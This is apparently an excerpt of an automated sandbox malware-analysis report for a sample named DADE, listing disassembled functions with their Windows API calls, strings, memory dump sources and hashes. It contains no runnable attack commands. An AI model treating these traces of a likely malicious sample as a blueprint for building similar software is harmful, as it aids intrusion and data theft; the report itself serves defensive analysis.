                                                      • Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Exception@8ThrowXinvalid_argumentmemcpystd::_std::exception::exception
                                                      • String ID: string too long
                                                      • API String ID: 2475949303-2556327735
                                                      • Opcode ID: cf6b60b1bc04ba4a2ac18f1f7a23f9c920bac7eb4e79507fd8cda2023fcf2671
                                                      • Instruction ID: fcf71bdc140fe32093c9f7753cd2ddaa01766cb0764a4124a3dd8a078f1da807
                                                      • Opcode Fuzzy Hash: cf6b60b1bc04ba4a2ac18f1f7a23f9c920bac7eb4e79507fd8cda2023fcf2671
                                                      • Instruction Fuzzy Hash: C02125727046045BE720CE6DDA4062BB7E6EBD5320F148A3FE885D33C0DF74A9418798
                                                      APIs
                                                      • std::_Xinvalid_argument.LIBCPMT ref: 009F5BA9
                                                        • Part of subcall function 009FA40A: std::exception::exception.LIBCMT ref: 009FA41F
                                                        • Part of subcall function 009FA40A: __CxxThrowException@8.LIBCMT ref: 009FA434
                                                        • Part of subcall function 009FA40A: std::exception::exception.LIBCMT ref: 009FA445
                                                      • std::_Xinvalid_argument.LIBCPMT ref: 009F5BBC
                                                      Strings
                                                      • Sec-WebSocket-Version: 13, xrefs: 009F5BAE
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
                                                      • String ID: Sec-WebSocket-Version: 13
                                                      • API String ID: 963545896-4220314181
                                                      • Opcode ID: 625f04cb9a0d46676825a7364065e981b88a445be79eb14be35e872224d31c74
                                                      • Instruction ID: 6c1e197039fb8bc44ce70916319b518d3b595a2e610af4ed309bbf6c42dca234
                                                      • Opcode Fuzzy Hash: 625f04cb9a0d46676825a7364065e981b88a445be79eb14be35e872224d31c74
                                                      • Instruction Fuzzy Hash: 1311E531314B448BC3319F2CE800B2A77E5ABD1711F260B6DE292C7685C761D84287A5
                                                      APIs
                                                      • std::_Xinvalid_argument.LIBCPMT ref: 00408BBF
                                                        • Part of subcall function 0042A1F0: std::exception::exception.LIBCMT ref: 0042A205
                                                        • Part of subcall function 0042A1F0: __CxxThrowException@8.LIBCMT ref: 0042A21A
                                                      • memmove.MSVCRT(?,?,?,?,?,004089E2,00000000,?,?,00408800,?,00000000,004077D7), ref: 00408BF5
                                                      Strings
                                                      • invalid string position, xrefs: 00408BBA
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Exception@8ThrowXinvalid_argumentmemmovestd::_std::exception::exception
                                                      • String ID: invalid string position
                                                      • API String ID: 655285616-1799206989
                                                      • Opcode ID: 7bb33ee19573d8d45d322caacc1546af5578b0847bed3ffa247c93bb799780da
                                                      • Instruction ID: 1be7ab364882a8fa79e272fabefde4f39cec4c957e742b5a331aa6ba38d6d88d
                                                      • Opcode Fuzzy Hash: 7bb33ee19573d8d45d322caacc1546af5578b0847bed3ffa247c93bb799780da
                                                      • Instruction Fuzzy Hash: D701D4703047014BD7258A2CEE9062AB3F6DBD1704B24093EE1D2DB785DBB8EC828398
                                                      APIs
                                                      • lstrlen.KERNEL32(?,00000000,?), ref: 009D4DA6
                                                      • InternetCrackUrlA.WININET(?,00000000), ref: 009D4DAE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CrackInternetlstrlen
                                                      • String ID: <
                                                      • API String ID: 1274457161-4251816714
                                                      • Opcode ID: c02e02a012b36fed2c74b04be6013df41c29549af876b812a53909887fa019d5
                                                      • Instruction ID: 2e23a665bef70e6716fa7f32c5965a04101f40d52bf71b1245d566adfa5bfcc8
                                                      • Opcode Fuzzy Hash: c02e02a012b36fed2c74b04be6013df41c29549af876b812a53909887fa019d5
                                                      • Instruction Fuzzy Hash: B0011B71D00218AFDB10DFA8EC45B9EBBA9EB59360F00812AF954E7390DB7459058FD0
                                                      APIs
                                                      • std::_Xinvalid_argument.LIBCPMT ref: 009D89CE
                                                        • Part of subcall function 009FA40A: std::exception::exception.LIBCMT ref: 009FA41F
                                                        • Part of subcall function 009FA40A: __CxxThrowException@8.LIBCMT ref: 009FA434
                                                        • Part of subcall function 009FA40A: std::exception::exception.LIBCMT ref: 009FA445
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                                                      • String ID: yxxx$yxxx
                                                      • API String ID: 1823113695-1021751087
                                                      • Opcode ID: a9d6882bbc2a6b05e7acd6381be3345c5a12b386bb702fb3c3b73543a5313761
                                                      • Instruction ID: 38b8c436f46292dc5028c26d3c2d6dd1deed76e767c1c2ded7ab3ebfa8b3c595
                                                      • Opcode Fuzzy Hash: a9d6882bbc2a6b05e7acd6381be3345c5a12b386bb702fb3c3b73543a5313761
                                                      • Instruction Fuzzy Hash: 33F0B463B800320B8314A47D9D844AFA90796E439033AD727E91ADF39EEC31EC8295D1
                                                      APIs
                                                        • Part of subcall function 009F4287: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 009F42B4
                                                        • Part of subcall function 009F4287: lstrcpy.KERNEL32(00000000,?), ref: 009F42E9
                                                        • Part of subcall function 009F7557: lstrcpy.KERNEL32(00000000), ref: 009F7586
                                                        • Part of subcall function 009F7557: lstrcat.KERNEL32(00000000), ref: 009F7592
                                                        • Part of subcall function 009F75A7: lstrlen.KERNEL32(------,009D5D82), ref: 009F75B2
                                                        • Part of subcall function 009F75A7: lstrcpy.KERNEL32(00000000), ref: 009F75D6
                                                        • Part of subcall function 009F75A7: lstrcat.KERNEL32(?,------), ref: 009F75E0
                                                        • Part of subcall function 009F7517: lstrcpy.KERNEL32(00000000), ref: 009F7545
                                                        • Part of subcall function 009F4077: lstrcpy.KERNEL32(00000000,0042D01C), ref: 009F40AC
                                                        • Part of subcall function 009F4077: lstrcpy.KERNEL32(00000000,00638AA4), ref: 009F40D6
                                                        • Part of subcall function 009F4077: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,009D1495,?,0000001A), ref: 009F40E0
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009EC5B2
                                                      • lstrcat.KERNEL32(00000000), ref: 009EC5BC
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009EC5EA
                                                      • lstrcpy.KERNEL32(00000000,0042D01C), ref: 009EC629
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$lstrcat$FolderPathSystemTimelstrlen
                                                      • String ID:
                                                      • API String ID: 2910713533-0
                                                      • Opcode ID: c119ec92df3871871dffaf0474d1d7a138caf980c1379f325d92db08c09d55e7
                                                      • Instruction ID: a88db62c56f39d4aed32f7e0bddedf94938a74d358f9bfd8be25c631e80e59eb
                                                      • Opcode Fuzzy Hash: c119ec92df3871871dffaf0474d1d7a138caf980c1379f325d92db08c09d55e7
                                                      • Instruction Fuzzy Hash: 37318FB1D042899BCB21EFA4CC85BAEB7B5EF85304F148466F514A7252DB74ED02DF50
                                                      APIs
                                                        • Part of subcall function 009F4287: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 009F42B4
                                                        • Part of subcall function 009F4287: lstrcpy.KERNEL32(00000000,?), ref: 009F42E9
                                                        • Part of subcall function 009F7557: lstrcpy.KERNEL32(00000000), ref: 009F7586
                                                        • Part of subcall function 009F7557: lstrcat.KERNEL32(00000000), ref: 009F7592
                                                        • Part of subcall function 009F75A7: lstrlen.KERNEL32(------,009D5D82), ref: 009F75B2
                                                        • Part of subcall function 009F75A7: lstrcpy.KERNEL32(00000000), ref: 009F75D6
                                                        • Part of subcall function 009F75A7: lstrcat.KERNEL32(?,------), ref: 009F75E0
                                                        • Part of subcall function 009F7517: lstrcpy.KERNEL32(00000000), ref: 009F7545
                                                        • Part of subcall function 009F4077: lstrcpy.KERNEL32(00000000,0042D01C), ref: 009F40AC
                                                        • Part of subcall function 009F4077: lstrcpy.KERNEL32(00000000,00638AA4), ref: 009F40D6
                                                        • Part of subcall function 009F4077: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,009D1495,?,0000001A), ref: 009F40E0
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009EC5B2
                                                      • lstrcat.KERNEL32(00000000), ref: 009EC5BC
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009EC5EA
                                                      • lstrcpy.KERNEL32(00000000,0042D01C), ref: 009EC629
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$lstrcat$FolderPathSystemTimelstrlen
                                                      • String ID:
                                                      • API String ID: 2910713533-0
                                                      • Opcode ID: ea4b98e16ecb482ecbdb8514f55abeb370371b626d7f48b9f57da31b4db55f9c
                                                      • Instruction ID: 3dd3aa9787047394b2aa59adc91addb4ca3f64d956732bd5c5039e432adc3d3f
                                                      • Opcode Fuzzy Hash: ea4b98e16ecb482ecbdb8514f55abeb370371b626d7f48b9f57da31b4db55f9c
                                                      • Instruction Fuzzy Hash: 9031C1B1E042889BCB21EFA4CC85BAEB7B5EF85304F148466F444A7251DB74EE42DF40
                                                      APIs
                                                        • Part of subcall function 009F4287: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 009F42B4
                                                        • Part of subcall function 009F4287: lstrcpy.KERNEL32(00000000,?), ref: 009F42E9
                                                        • Part of subcall function 009F7557: lstrcpy.KERNEL32(00000000), ref: 009F7586
                                                        • Part of subcall function 009F7557: lstrcat.KERNEL32(00000000), ref: 009F7592
                                                        • Part of subcall function 009F75A7: lstrlen.KERNEL32(------,009D5D82), ref: 009F75B2
                                                        • Part of subcall function 009F75A7: lstrcpy.KERNEL32(00000000), ref: 009F75D6
                                                        • Part of subcall function 009F75A7: lstrcat.KERNEL32(?,------), ref: 009F75E0
                                                        • Part of subcall function 009F7517: lstrcpy.KERNEL32(00000000), ref: 009F7545
                                                        • Part of subcall function 009F4077: lstrcpy.KERNEL32(00000000,0042D01C), ref: 009F40AC
                                                        • Part of subcall function 009F4077: lstrcpy.KERNEL32(00000000,00638AA4), ref: 009F40D6
                                                        • Part of subcall function 009F4077: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,009D1495,?,0000001A), ref: 009F40E0
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009EC5B2
                                                      • lstrcat.KERNEL32(00000000), ref: 009EC5BC
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009EC5EA
                                                      • lstrcpy.KERNEL32(00000000,0042D01C), ref: 009EC629
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$lstrcat$FolderPathSystemTimelstrlen
                                                      • String ID:
                                                      • API String ID: 2910713533-0
                                                      • Opcode ID: c3a13b43bfbb22c5b3688386ed9a797ab2b2dd583fad0e3a56070e27306dfb91
                                                      • Instruction ID: f0af5c4dcb8cfb87a3c913a07bb88894657fd74c1c67d5f025faca698121b51c
                                                      • Opcode Fuzzy Hash: c3a13b43bfbb22c5b3688386ed9a797ab2b2dd583fad0e3a56070e27306dfb91
                                                      • Instruction Fuzzy Hash: C231AFB1D442899BCB21EFA4CC85BAEB7B5EF84304F148466F504A7252DB74ED42DF40
                                                      APIs
                                                        • Part of subcall function 009F4287: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 009F42B4
                                                        • Part of subcall function 009F4287: lstrcpy.KERNEL32(00000000,?), ref: 009F42E9
                                                        • Part of subcall function 009F7557: lstrcpy.KERNEL32(00000000), ref: 009F7586
                                                        • Part of subcall function 009F7557: lstrcat.KERNEL32(00000000), ref: 009F7592
                                                        • Part of subcall function 009F75A7: lstrlen.KERNEL32(------,009D5D82), ref: 009F75B2
                                                        • Part of subcall function 009F75A7: lstrcpy.KERNEL32(00000000), ref: 009F75D6
                                                        • Part of subcall function 009F75A7: lstrcat.KERNEL32(?,------), ref: 009F75E0
                                                        • Part of subcall function 009F7517: lstrcpy.KERNEL32(00000000), ref: 009F7545
                                                        • Part of subcall function 009F4077: lstrcpy.KERNEL32(00000000,0042D01C), ref: 009F40AC
                                                        • Part of subcall function 009F4077: lstrcpy.KERNEL32(00000000,00638AA4), ref: 009F40D6
                                                        • Part of subcall function 009F4077: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,009D1495,?,0000001A), ref: 009F40E0
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009EC5B2
                                                      • lstrcat.KERNEL32(00000000), ref: 009EC5BC
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009EC5EA
                                                      • lstrcpy.KERNEL32(00000000,0042D01C), ref: 009EC629
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$lstrcat$FolderPathSystemTimelstrlen
                                                      • String ID:
                                                      • API String ID: 2910713533-0
                                                      • Opcode ID: 5196f8d7d8ffbf8b536d13f2c8f0d4bd6a1504af06b38276e959285185f57b7a
                                                      • Instruction ID: 2c0a2bd964beba8487c2cc0ad39e1cc49036cd292dc57436a49d64cb983cc7a2
                                                      • Opcode Fuzzy Hash: 5196f8d7d8ffbf8b536d13f2c8f0d4bd6a1504af06b38276e959285185f57b7a
                                                      • Instruction Fuzzy Hash: 1731AFB1D042899BCB21EFA4CC85BAEB7B9EF84304F148466F404A7251DB74EE42DF50
                                                      APIs
                                                        • Part of subcall function 009F4287: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 009F42B4
                                                        • Part of subcall function 009F4287: lstrcpy.KERNEL32(00000000,?), ref: 009F42E9
                                                        • Part of subcall function 009F7557: lstrcpy.KERNEL32(00000000), ref: 009F7586
                                                        • Part of subcall function 009F7557: lstrcat.KERNEL32(00000000), ref: 009F7592
                                                        • Part of subcall function 009F75A7: lstrlen.KERNEL32(------,009D5D82), ref: 009F75B2
                                                        • Part of subcall function 009F75A7: lstrcpy.KERNEL32(00000000), ref: 009F75D6
                                                        • Part of subcall function 009F75A7: lstrcat.KERNEL32(?,------), ref: 009F75E0
                                                        • Part of subcall function 009F7517: lstrcpy.KERNEL32(00000000), ref: 009F7545
                                                        • Part of subcall function 009F4077: lstrcpy.KERNEL32(00000000,0042D01C), ref: 009F40AC
                                                        • Part of subcall function 009F4077: lstrcpy.KERNEL32(00000000,00638AA4), ref: 009F40D6
                                                        • Part of subcall function 009F4077: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,009D1495,?,0000001A), ref: 009F40E0
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009EC5B2
                                                      • lstrcat.KERNEL32(00000000), ref: 009EC5BC
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009EC5EA
                                                      • lstrcpy.KERNEL32(00000000,0042D01C), ref: 009EC629
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$lstrcat$FolderPathSystemTimelstrlen
                                                      • String ID:
                                                      • API String ID: 2910713533-0
                                                      • Opcode ID: 1214f168b6e4d7af61603e865717b0356397f2a796f8462a60e47e72beb01155
                                                      • Instruction ID: 8f927ea05dd79d6372758e0d617005a810b3031a63ae59897bb2f4c1f2ca3041
                                                      • Opcode Fuzzy Hash: 1214f168b6e4d7af61603e865717b0356397f2a796f8462a60e47e72beb01155
                                                      • Instruction Fuzzy Hash: 71316DB1E042899BCB11EFA4CC85BAEB7B5EF85305F148466E504AB251DB74EE02DF50
                                                      APIs
                                                      • lstrcpy.KERNEL32(00000000), ref: 00421581
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 004215B9
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 004215F1
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 00421629
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy
                                                      • String ID:
                                                      • API String ID: 3722407311-0
                                                      • Opcode ID: 7249e6668abafaf4035fa494e08afe422198d967ac41c3c40e0ecb1d77fcd613
                                                      • Instruction ID: 80d308abde563585a592328bb7eba962bc113a2ea9b505a2ad5a72594fb3347d
                                                      • Opcode Fuzzy Hash: 7249e6668abafaf4035fa494e08afe422198d967ac41c3c40e0ecb1d77fcd613
                                                      • Instruction Fuzzy Hash: EE211EB4701B029BD724DF3AD958A17B7F5BF54700B444A2EA486D7BA0DB78F840CBA4
                                                      APIs
                                                        • Part of subcall function 00401510: lstrcpy.KERNEL32(00000000), ref: 0040152D
                                                        • Part of subcall function 00401510: lstrcpy.KERNEL32(00000000,?), ref: 0040154F
                                                        • Part of subcall function 00401510: lstrcpy.KERNEL32(00000000,?), ref: 00401571
                                                        • Part of subcall function 00401510: lstrcpy.KERNEL32(00000000,?), ref: 00401593
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 00401437
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 00401459
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 0040147B
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 004014DF
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy
                                                      • String ID:
                                                      • API String ID: 3722407311-0
                                                      • Opcode ID: bea906036c5024bdad2b439cbe047c88e0159a543058b9686e88131c65337636
                                                      • Instruction ID: 368a80f0553ecf631160e054036b62fbe6d7ddfceb8bd69434bdfc69ba453b92
                                                      • Opcode Fuzzy Hash: bea906036c5024bdad2b439cbe047c88e0159a543058b9686e88131c65337636
                                                      • Instruction Fuzzy Hash: 4A31A575A01B029FC728DF3AD588957BBE5BF48704700492EA956D3BA0DB74F811CB94
                                                      APIs
                                                        • Part of subcall function 009D1777: lstrcpy.KERNEL32(00000000), ref: 009D1794
                                                        • Part of subcall function 009D1777: lstrcpy.KERNEL32(00000000,?), ref: 009D17B6
                                                        • Part of subcall function 009D1777: lstrcpy.KERNEL32(00000000,?), ref: 009D17D8
                                                        • Part of subcall function 009D1777: lstrcpy.KERNEL32(00000000,?), ref: 009D17FA
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 009D169E
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 009D16C0
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 009D16E2
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 009D1746
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy
                                                      • String ID:
                                                      • API String ID: 3722407311-0
                                                      • Opcode ID: 171f9c098ff936ecfc8a21f2e49e70ffbd26c7e9154b77e38915ce96a98a388b
                                                      • Instruction ID: 2d6e8bdca0f123c52a56453714e2adb7bd189464f87dce6d138644a9273bbf06
                                                      • Opcode Fuzzy Hash: 171f9c098ff936ecfc8a21f2e49e70ffbd26c7e9154b77e38915ce96a98a388b
                                                      • Instruction Fuzzy Hash: AA31EA75A41B42AFC724DF3AC988956BBE9FF88305704892EA456D3B50D774F810CF90
                                                      APIs
                                                        • Part of subcall function 009D1777: lstrcpy.KERNEL32(00000000), ref: 009D1794
                                                        • Part of subcall function 009D1777: lstrcpy.KERNEL32(00000000,?), ref: 009D17B6
                                                        • Part of subcall function 009D1777: lstrcpy.KERNEL32(00000000,?), ref: 009D17D8
                                                        • Part of subcall function 009D1777: lstrcpy.KERNEL32(00000000,?), ref: 009D17FA
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 009D169E
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 009D16C0
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 009D16E2
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 009D1746
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy
                                                      • String ID:
                                                      • API String ID: 3722407311-0
                                                      • Opcode ID: adf978454c3d5bdd2a26ceaf3544a8e4f67307e827b9ebe409f1eb4b0b822894
                                                      • Instruction ID: 27216c34c6c1d023a415fdc00e94e0a5bcba2ca49ad16c0b1ac62d321e28f733
